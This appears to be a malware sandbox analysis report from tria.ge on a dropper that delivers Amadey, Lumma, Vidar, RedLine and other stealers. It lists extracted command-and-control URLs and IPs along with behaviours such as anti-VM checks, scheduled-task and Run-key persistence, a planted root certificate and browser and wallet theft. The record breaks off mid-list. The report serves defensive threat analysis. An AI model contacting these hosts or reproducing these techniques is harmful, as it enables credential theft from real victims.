Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
106s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
08/03/2025, 15:45
Static task
static1
Behavioral task
behavioral1
Sample
fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
Resource
win10v2004-20250217-en
General
-
Target
fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
-
Size
1.8MB
-
MD5
e74b537fdba9af9c83579432d7107627
-
SHA1
5127e6d77e38aca75a65f529444f719121b49416
-
SHA256
fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6
-
SHA512
2dec46234f2766f7c2ac7a3b958a15724f3d3fe79d3fd19b027755a75dabb8bc338e9f70bf3e4d9387cb1d4df7ffc1b453caf58d65697d4792454b912c5b581d
-
SSDEEP
49152:9iaa2xk0sV9LEstt/P8LA6XL2DGlf2XKZY:c2OR3EsH/kLA02SeXKa
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://begindecafer.world/api
https://9garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://ksterpickced.digital/api
https://dawtastream.bet/api
https://foresctwhispers.top/api
https://tracnquilforest.life/api
https://xcollapimga.fun/api
https://strawpeasaen.fun/api
https://jquietswtreams.life/api
https://starrynsightsky.icu/api
https://earthsymphzony.today/api
https://zfurrycomp.top/api
https://garagedrootz.top/api
https://larisechairedd.shop/api
https://sterpickced.digital/api
https://garisechairedd.shop/api
https://0modelshiverd.icu/api
https://j8arisechairedd.shop/api
https://gmodelshiverd.icu/api
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
redline
Build 7
101.99.92.190:40919
Signatures
-
Amadey family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/2656-697-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/1500-756-0x0000000000A70000-0x0000000000D30000-memory.dmp healer behavioral1/memory/1500-755-0x0000000000A70000-0x0000000000D30000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/2056-782-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral1/memory/2056-782-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Sectoprat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 2700 created 1196 2700 Occupation.com 21 PID 2700 created 1196 2700 Occupation.com 21 PID 824 created 1196 824 Seat.com 21 PID 824 created 1196 824 Seat.com 21 -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0102b962a1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 516d293752.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ yUI6F6C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ CgmaT61.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4189e09c15.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2cd9a90288.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 388 2648 powershell.exe 391 2648 powershell.exe 399 2648 powershell.exe 403 2648 powershell.exe 434 1120 powershell.exe 435 1120 powershell.exe 436 1120 powershell.exe 437 1120 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2804 powershell.exe 2648 powershell.exe 824 powershell.exe 1120 powershell.exe -
Downloads MZ/PE file 14 IoCs
flow pid Process 590 2720 rapes.exe 590 2720 rapes.exe 590 2720 rapes.exe 590 2720 rapes.exe 590 2720 rapes.exe 590 2720 rapes.exe 5 2720 rapes.exe 5 2720 rapes.exe 5 2720 rapes.exe 5 2720 rapes.exe 87 2720 rapes.exe 87 2720 rapes.exe 141 2444 BitLockerToGo.exe 423 1780 BitLockerToGo.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000400000001cc88-669.dat net_reactor behavioral1/memory/2060-677-0x0000000000170000-0x00000000001D0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yUI6F6C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yUI6F6C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CgmaT61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CgmaT61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4189e09c15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4189e09c15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2cd9a90288.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 516d293752.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0102b962a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0102b962a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2cd9a90288.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 516d293752.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url cmd.exe -
Executes dropped EXE 25 IoCs
pid Process 2720 rapes.exe 2988 XxzH301.exe 848 4189e09c15.exe 2028 4jblLC1.exe 936 2cd9a90288.exe 1652 CONAtdrive.exe 2324 0102b962a1.exe 2468 516d293752.exe 1692 CONAtdrive.exe 1760 3a084e6b3d.exe 1708 3a084e6b3d.exe 2584 m4mrV1B.exe 844 m4mrV1B.exe 2972 4jblLC1.exe 1956 XxzH301.exe 2708 ReK7Ewx.exe 2700 Occupation.com 1600 V0Bt74c.exe 2952 V0Bt74c.exe 2684 yUI6F6C.exe 3032 ADFoyxP.exe 824 Seat.com 1724 zY9sqWs.exe 2936 Gxtuum.exe 2244 CgmaT61.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 0102b962a1.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 516d293752.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine yUI6F6C.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine CgmaT61.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 4189e09c15.exe Key opened \REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine 2cd9a90288.exe -
Loads dropped DLL 62 IoCs
pid Process 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 596 WerFault.exe 596 WerFault.exe 596 WerFault.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 2028 4jblLC1.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 1760 3a084e6b3d.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 1764 WerFault.exe 2792 WerFault.exe 2792 WerFault.exe 2792 WerFault.exe 2792 WerFault.exe 2792 WerFault.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 2720 rapes.exe 2756 cmd.exe 2444 BitLockerToGo.exe 2720 rapes.exe 1600 V0Bt74c.exe 2836 WerFault.exe 2836 WerFault.exe 2836 WerFault.exe 2836 WerFault.exe 2836 WerFault.exe 2668 WerFault.exe 2668 WerFault.exe 2668 WerFault.exe 2668 WerFault.exe 2668 WerFault.exe 2720 rapes.exe 2720 rapes.exe 888 WerFault.exe 888 WerFault.exe 888 WerFault.exe 1780 BitLockerToGo.exe 2720 rapes.exe 2680 cmd.exe 2720 rapes.exe 1724 zY9sqWs.exe 2700 Occupation.com 2720 rapes.exe 2720 rapes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" m4mrV1B.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" m4mrV1B.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 397 bitbucket.org 399 bitbucket.org 403 bitbucket.org 436 bitbucket.org 437 bitbucket.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000400000001cd6f-735.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 1900 tasklist.exe 1988 tasklist.exe 748 tasklist.exe 2960 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 2720 rapes.exe 848 4189e09c15.exe 936 2cd9a90288.exe 2324 0102b962a1.exe 2468 516d293752.exe 2684 yUI6F6C.exe 2244 CgmaT61.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 936 set thread context of 2444 936 2cd9a90288.exe 43 PID 1760 set thread context of 1708 1760 3a084e6b3d.exe 49 PID 2468 set thread context of 1780 2468 516d293752.exe 59 PID 1600 set thread context of 2952 1600 V0Bt74c.exe 93 -
Drops file in Windows directory 12 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe File opened for modification C:\Windows\PracticeRoot ReK7Ewx.exe File opened for modification C:\Windows\AccreditationShed ADFoyxP.exe File opened for modification C:\Windows\UpdatedMakeup ADFoyxP.exe File opened for modification C:\Windows\CombatTongue ReK7Ewx.exe File opened for modification C:\Windows\PlatesRegister ReK7Ewx.exe File opened for modification C:\Windows\PerfectlyFda ADFoyxP.exe File opened for modification C:\Windows\GovernmentsHighly ADFoyxP.exe File opened for modification C:\Windows\HighKerry ADFoyxP.exe File opened for modification C:\Windows\PracticalPrevent ADFoyxP.exe File opened for modification C:\Windows\FilenameWho ADFoyxP.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 10 IoCs
pid pid_target Process procid_target 596 848 WerFault.exe 34 1764 1760 WerFault.exe 48 2792 1708 WerFault.exe 49 2836 1600 WerFault.exe 92 2668 2952 WerFault.exe 93 888 2684 WerFault.exe 96 2180 2244 WerFault.exe 123 2928 2060 WerFault.exe 125 560 2924 WerFault.exe 132 1560 2752 WerFault.exe 141 -
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4jblLC1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yUI6F6C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Seat.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2cd9a90288.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ReK7Ewx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4189e09c15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0102b962a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a084e6b3d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CgmaT61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XxzH301.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 516d293752.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4jblLC1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language V0Bt74c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language V0Bt74c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a084e6b3d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ADFoyxP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CONAtdrive.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XxzH301.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Occupation.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CONAtdrive.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Kills process with taskkill 3 IoCs
pid Process 1820 taskkill.exe 1948 taskkill.exe 2160 taskkill.exe -
Modifies system certificate store 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 3a084e6b3d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 3a084e6b3d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 3a084e6b3d.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2532 schtasks.exe 876 schtasks.exe 2044 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1652 CONAtdrive.exe -
Suspicious behavior: EnumeratesProcesses 51 IoCs
pid Process 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 2720 rapes.exe 848 4189e09c15.exe 936 2cd9a90288.exe 2324 0102b962a1.exe 2468 516d293752.exe 2804 powershell.exe 2648 powershell.exe 824 powershell.exe 1120 powershell.exe 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2684 yUI6F6C.exe 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 824 Seat.com 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 2244 CgmaT61.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2028 4jblLC1.exe Token: SeBackupPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe 